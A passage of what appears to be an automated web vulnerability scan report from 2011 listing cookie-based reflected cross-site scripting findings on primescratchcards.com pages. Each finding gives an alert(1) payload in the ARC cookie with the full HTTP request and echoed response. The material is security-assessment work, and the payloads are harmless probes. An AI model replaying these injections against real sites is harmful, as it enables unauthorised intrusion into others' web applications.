

   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=13013748d54';alert(1)//d85284f838d&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.100. http://primescratchcards.com/images/InviteFriend.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/InviteFriend.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b048'%3balert(1)//c701db3fcc6 was submitted in the ARC cookie. This input was echoed as 7b048';alert(1)//c701db3fcc6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /images/InviteFriend.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301377b048'%3balert(1)//c701db3fcc6; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=1301377b048%27%3Balert%281%29%2F%2Fc701db3fcc6; expires=Tue, 15-May-2012 12:38:12 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }


   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=1301377b048';alert(1)//c701db3fcc6&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.101. http://primescratchcards.com/images/InviteFriend.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/InviteFriend.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload ad971--><script>alert(1)</script>f13763517ed was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/InviteFriend.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137ad971--><script>alert(1)</script>f13763517ed; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:15 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=130137ad971%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ef13763517ed; expires=Tue, 15-May-2012 12:38:14 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137ad971--><script>alert(1)</script>f13763517ed">
...[SNIP]...

3.102. http://primescratchcards.com/images/InviteFriend.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/InviteFriend.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5f1e"%3balert(1)//469e8a0b361 was submitted in the ARC cookie. This input was echoed as d5f1e";alert(1)//469e8a0b361 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /images/InviteFriend.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137d5f1e"%3balert(1)//469e8a0b361; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137d5f1e%22%3Balert%281%29%2F%2F469e8a0b361; expires=Tue, 15-May-2012 12:38:12 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137d5f1e";alert(1)//469e8a0b361' border='0' width='1' height='1'>
...[SNIP]...

3.103. http://primescratchcards.com/images/Responsible.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/Responsible.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38b11"%3balert(1)//4b7eb4d38ea was submitted in the ARC cookie. This input was echoed as 38b11";alert(1)//4b7eb4d38ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /images/Responsible.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013738b11"%3balert(1)//4b7eb4d38ea; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:27 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=13013738b11%22%3Balert%281%29%2F%2F4b7eb4d38ea; expires=Tue, 15-May-2012 12:38:26 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=13013738b11";alert(1)//4b7eb4d38ea' border='0' width='1' height='1'>
...[SNIP]...

3.104. http://primescratchcards.com/images/Responsible.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/Responsible.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload d5a37--><script>alert(1)</script>2daf1f805c5 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/Responsible.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137d5a37--><script>alert(1)</script>2daf1f805c5; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:30 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=130137d5a37%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E2daf1f805c5; expires=Tue, 15-May-2012 12:38:30 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137d5a37--><script>alert(1)</script>2daf1f805c5">
...[SNIP]...

3.105. http://primescratchcards.com/images/Responsible.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/Responsible.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39fde'%3balert(1)//02965ba86d3 was submitted in the ARC cookie. This input was echoed as 39fde';alert(1)//02965ba86d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /images/Responsible.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013739fde'%3balert(1)//02965ba86d3; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=13013739fde%27%3Balert%281%29%2F%2F02965ba86d3; expires=Tue, 15-May-2012 12:38:28 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }


   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=13013739fde';alert(1)//02965ba86d3&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.106. http://primescratchcards.com/images/SecurityAndPrivacy.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/SecurityAndPrivacy.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload 7b916--><script>alert(1)</script>15bbf18f026 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/SecurityAndPrivacy.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301377b916--><script>alert(1)</script>15bbf18f026; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=1301377b916%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E15bbf18f026; expires=Tue, 15-May-2012 12:38:28 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="1301377b916--><script>alert(1)</script>15bbf18f026">
...[SNIP]...

3.107. http://primescratchcards.com/images/SecurityAndPrivacy.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/SecurityAndPrivacy.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c7a4'%3balert(1)//9a734a2209d was submitted in the ARC cookie. This input was echoed as 8c7a4';alert(1)//9a734a2209d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /images/SecurityAndPrivacy.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301378c7a4'%3balert(1)//9a734a2209d; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=1301378c7a4%27%3Balert%281%29%2F%2F9a734a2209d; expires=Tue, 15-May-2012 12:38:28 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }


   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=1301378c7a4';alert(1)//9a734a2209d&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.108. http://primescratchcards.com/images/SecurityAndPrivacy.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/SecurityAndPrivacy.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59ace"%3balert(1)//b357ff571da was submitted in the ARC cookie. This input was echoed as 59ace";alert(1)//b357ff571da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /images/SecurityAndPrivacy.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013759ace"%3balert(1)//b357ff571da; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:26 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=13013759ace%22%3Balert%281%29%2F%2Fb357ff571da; expires=Tue, 15-May-2012 12:38:26 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=13013759ace";alert(1)//b357ff571da' border='0' width='1' height='1'>
...[SNIP]...

3.109. http://primescratchcards.com/images/aboutus.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/aboutus.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dcc5b'%3balert(1)//703cebd666 was submitted in the ARC cookie. This input was echoed as dcc5b';alert(1)//703cebd666 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /images/aboutus.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137dcc5b'%3balert(1)//703cebd666; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19396
Content-Type: text/html
Set-Cookie: ARC=130137dcc5b%27%3Balert%281%29%2F%2F703cebd666; expires=Tue, 15-May-2012 12:38:10 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }


   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=130137dcc5b';alert(1)//703cebd666&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.110. http://primescratchcards.com/images/aboutus.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/aboutus.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload 4d39c--><script>alert(1)</script>62968452208 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/aboutus.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301374d39c--><script>alert(1)</script>62968452208; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=1301374d39c%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E62968452208; expires=Tue, 15-May-2012 12:38:12 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="1301374d39c--><script>alert(1)</script>62968452208">
...[SNIP]...

3.111. http://primescratchcards.com/images/aboutus.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/aboutus.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2596a"%3balert(1)//e55764e40a4 was submitted in the ARC cookie. This input was echoed as 2596a";alert(1)//e55764e40a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /images/aboutus.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301372596a"%3balert(1)//e55764e40a4; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=1301372596a%22%3Balert%281%29%2F%2Fe55764e40a4; expires=Tue, 15-May-2012 12:38:10 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=1301372596a";alert(1)//e55764e40a4' border='0' width='1' height='1'>
...[SNIP]...

3.112. http://primescratchcards.com/images/affiliates.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/affiliates.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload f636d--><script>alert(1)</script>bab01666262 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/affiliates.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137f636d--><script>alert(1)</script>bab01666262; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=130137f636d%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ebab01666262; expires=Tue, 15-May-2012 12:38:28 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137f636d--><script>alert(1)</script>bab01666262">
...[SNIP]...

3.113. http://primescratchcards.com/images/affiliates.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/affiliates.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46fe5'%3balert(1)//65cb78f18b8 was submitted in the ARC cookie. This input was echoed as 46fe5';alert(1)//65cb78f18b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /images/affiliates.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013746fe5'%3balert(1)//65cb78f18b8; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:26 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=13013746fe5%27%3Balert%281%29%2F%2F65cb78f18b8; expires=Tue, 15-May-2012 12:38:26 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }


   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=13013746fe5';alert(1)//65cb78f18b8&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
